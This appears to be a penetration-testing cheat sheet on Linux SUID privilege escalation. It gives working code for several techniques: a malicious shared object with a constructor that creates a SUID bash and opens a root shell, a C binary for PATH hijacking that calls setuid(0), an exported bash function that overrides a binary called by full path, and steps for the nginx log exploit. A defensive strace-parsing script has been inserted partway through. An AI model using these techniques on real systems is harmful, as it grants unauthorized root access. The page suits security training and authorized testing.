SUID

Last updated 4 years ago

Identify any uncommon SUID binaries on the system.

Check each one against GTFOBins:

SHARED OBJECT INJECTION:

Shared objects have a .so extension and are mostly located in /lib/ or /usr/lib/; they are the Linux equivalent of Windows DLL files. For each uncommon program in your SUID enumeration output, run it and check whether it tries to load a shared object that does not exist.

Run the program and observe what it does. If that reveals little, run it under strace, which traces every system call the application makes, and use strings to print only the human-readable strings in the binary. Look for any error reading "No such file or directory", and grep the output with: grep -i -E "open|access|no such file"

Then replace one of the missing files with a malicious shared object:

#include <stdio.h>
#include <stdlib.h>

/* Marked as a constructor so it runs as soon as the SUID program loads
   this library, i.e. with the program's root privileges. */
static void inject(void) __attribute__((constructor));

static void inject(void) {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Create the directory the program looks in: mkdir /home/user/.config

Compile the library: gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c

Run the SUID program again; when it loads the library the constructor runs as root and drops you into a root shell.
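A defender-side check for the shared object injection scenario above, as an added example that is not part of the original page: it parses strace output (a constructed sample is embedded) for lookups that failed with "No such file or directory" and flags the ones whose directory an unprivileged user can write to, which is the condition that makes a SUID binary hijackable. Function and constant names are my own.

```python
import os
import re

# Constructed sample trace (not captured from a real system), in the shape
# that `strace -v -f -o out ./suid-program` writes.
SAMPLE_TRACE = """\
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
[pid  4242] open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib/libcalc.so", O_RDONLY) = 3
"""

# One strace line for a file lookup that failed with ENOENT, with optional
# "[pid N]" prefix (from -f) and optional AT_FDCWD first argument (openat).
ENOENT_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?'
    r'(?P<call>open|openat|access|stat|lstat|execve)\('
    r'(?:AT_FDCWD,\s*)?"(?P<path>[^"]+)"'
    r'[^)]*\)\s*=\s*-1\s+ENOENT'
)

def missing_lookups(strace_output):
    """Return (syscall, path) for every lookup of a file that did not exist."""
    hits = []
    for line in strace_output.splitlines():
        m = ENOENT_RE.match(line)
        if m:
            hits.append((m.group("call"), m.group("path")))
    return hits

def parent_writable(path):
    """Default check: can the current user create the missing file?"""
    return os.access(os.path.dirname(path) or "/", os.W_OK)

def hijackable_paths(strace_output, writable=parent_writable):
    """Missing files whose directory an unprivileged user can write to.
    These are what to fix: the SUID program should only load from
    absolute, root-owned paths, never from user-writable directories."""
    return sorted({p for _, p in missing_lookups(strace_output) if writable(p)})

if __name__ == "__main__":
    for call, path in missing_lookups(SAMPLE_TRACE):
        print(f"{call:7s} {path}")
    print("hijackable:", hijackable_paths(SAMPLE_TRACE))
```

Run it with the real trace file instead of SAMPLE_TRACE to audit an actual SUID binary; the default writable check then uses the permissions of the system it runs on.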

BINARY SYMLINKS: nginxed-root.sh

This is a vulnerability in Nginx: the flaw is in the permissions of the log files nginx creates, and it lets a user escalate from www-data to root. You might find it through LES (Linux Exploit Suggester). Check the installed version with: dpkg -l | grep nginx

The exploit takes advantage of the SUID bit set on sudo. The log files are present at /var/log/nginx

The exploit only succeeds after a restart, so we need to simulate one. Then run the exploit.

ENVIRONMENT VARIABLES:

WITHOUT FULL PATH:

Check whether any SUID program calls a command without its full path. You can exploit this by creating a malicious file with the same name as that command and placing a directory you control at the front of the PATH environment variable.

cat > /tmp/command.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
EOF
#Compile the exploit
gcc /tmp/command.c -o /tmp/command
#Put our directory first so it is searched before the real command
export PATH=/tmp:$PATH
echo $PATH
#Run the SUID program

WITH FULL PATH:

If the program calls the command with its full path, you can instead try to exploit bash functions: define a function whose name is the full path and export it, and bash will run the function instead of the binary. This only works in bash versions older than 4.2-048, which still accept function names that look like paths.

function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
#Export the function under the same name it was defined with
export -f /usr/sbin/service
#Run the SUID program
/usr/local/bin/suid-env2

https://gtfobins.github.io/